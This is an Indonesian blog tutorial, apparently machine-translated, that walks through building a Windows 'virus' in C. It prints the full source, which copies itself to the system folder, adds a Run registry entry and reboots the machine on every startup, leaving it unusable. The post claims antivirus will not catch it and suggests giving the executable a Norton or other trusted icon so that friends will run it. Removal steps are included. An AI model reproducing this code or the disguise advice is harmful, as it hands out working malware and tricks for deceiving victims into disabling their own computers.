CARA MEMBUAT PROGRAM VIRUS RESTART KOMPUTER DI SETIAP KALI STARTUP
Hari ini saya akan menunjukkan Anda bagaimana untuk membuat
virus yang restart komputer setelah setiap startup.Artinya, setelah
infeksi, komputer akan restart setiap kali sistem di-boot. Ini berarti
bahwa komputer akan menjadi bisa dioperasi karena reboot secepat desktop
dimuat.
Untuk ini, virus perlu doubleclicked
hanya sekali dan sejak itu seterusnya akan membawa keluar sisa
operasi. Dan satu hal lagi, tidak ada software antivirus
mendeteksi’s ini sebagai virus karena saya telah dikodekan ini
virus di C . Jadi jika Anda sudah familiar denganbahasa
C maka terlalu mudah untuk memahami logika di balik coding.
Berikut ini adalah kode sumber.
#include<stdio.h>
#include<dos.h>
#include<dir.h>int found,drive_no;char buff[128];
void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to
determine the root drive
if(done==0)
{
done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to
determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}
void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy
of itself in a remote place
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for
starup
break;
case 2:
target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;
case 3:
target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;
case 4:
target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;
default:
exit(0);
}
while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}
else
system(“shutdown -r -t 0″); //if the system is already infected then
just give a command to restart
}
Kompilasi Kode Scource Ke Virus
eksekusi.
1. Download Kode
Sumber Disini
2. File yang didownload akan Sysres.C
3. Untuk langkah-demi-langkah panduan kompilasi, lihat posting saya Bagaimana
mengkompilasi C Program .
Pengujian Dan Menghapus
Virus ini Dari PC Anda
Anda dapat mengkompilasi dan tes ini
virus pada PC Anda sendiri tanpa rasa takut. Untuk menguji, hanya
DoubleClick yang sysres.exe file dan restart sistem
secara manual.Sekarang dan seterusnya, ketika setiap kali PC boot dan
desktop dimuat, PC Anda akan restart secara otomatis lagi dan lagi.
Tidak akan ada salahnya selain dari secara otomatis me-restart sistem
anda. Setelah pengujian, Anda dapat menghapus virus dengan
langkah-langkah berikut.
1. Reboot komputer Anda di SAFE MODE
2. Goto
X: \ Windows \ System
( X bisa menjadi C, D, E atau F)3.Anda akan
menemukan file dengan nama sysres.exe , menghapusnya.
4.Type regedit di run ke. Anda akan
goto registri editor.Here menavigasi
HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \
CurrentVersion \ Run
Di sana, di situs kanan anda akan melihat entri dengan nama “ SRES
“it.You. entry.That ‘s ini Hapus telah menghapus Virus ini berhasil.Logika Dibalik Kerja Virus ini
Jika saya tidak menjelaskan logika ( Algoritma )
balik kerja virus, posting ini akan tidak lengkap. Jadi saya akan
menjelaskan logika dengan cara yang disederhanakan. Di sini saya tidak
akan menjelaskan rincian teknis program. Jika Anda memiliki
keraguan lebih lanjut silakan lewat komentar.
LOGIC:
1. Pertama virus akan menemukan partisi root (Partisi di mana Windows
diinstal).
2. Selanjutnya akan menentukan apakah file Virus sudah disalin (Sudah
terinfeksi) ke X: \ Windows \ System
3. Jika tidak hanya akan menempatkan salinan dirinya ke dalam X:
\ Windows \ Systemdan membuat entri registry untuk menempatkan
file ini virus ke startup.
4. Atau jika virus tersebut sudah ditemukan di X: \ Windows \
System directory (folder), maka itu hanya memberikan perintah
untuk restart komputer.
Proses ini diulangi setiap kali PC di-restart.
CATATAN: Sistem tidak akan direstart segera
setelah Anda klik ganda Sysres.exe
file. sebuah proses restart akan terjadi dari boot berikutnya dari
sistem.
DAN SATU HAL SEBELUM
ANDA LEBIH CUTI (Langkah ini opsional)
Setelah anda mengkompilasi, yang Sysres.exe
file yang Anda dapatkan akan memilikiikon default
. Jadi, jika Anda mengirim file ini ke teman Anda mereka mungkin tidak
klik di atasnya karena memiliki ICON default. Jadi adalah mungkin untuk
mengubah ICON iniSysres.exe file ke dalam setiap ICON
lain yang lebih dipercaya dan terlihat menarik.
Sebagai contoh Anda dapat mengubah . exe ‘s file
icon ke Norton antivirus ICON itu sendiri sehingga
orang-orang melihat file ini percaya bahwa itu adalah Norton
antivirus .Atau Anda dapat mengubah’s ICON ke dalam ICON dari
setiap dan terpercaya program populer sehingga orang pasti akan klik di
atasnya.
Rincian tutorial mengubah ICON diberikan dalam posting saya Cara
Mengganti ICON Dari Sebuah File EXE .
Tidak ada komentar:
Posting Komentar